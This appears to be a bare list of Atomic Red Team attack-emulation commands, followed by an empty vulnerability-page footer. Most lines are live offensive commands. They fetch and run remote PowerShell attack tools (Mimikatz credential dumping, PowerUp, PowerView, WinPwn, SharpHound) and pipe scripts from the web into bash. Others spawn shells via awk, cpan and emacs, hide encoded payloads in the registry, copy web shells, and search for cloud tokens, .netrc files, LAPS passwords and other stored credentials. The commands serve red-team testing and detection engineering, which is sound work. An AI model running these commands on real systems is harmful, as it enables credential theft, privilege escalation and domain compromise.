Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.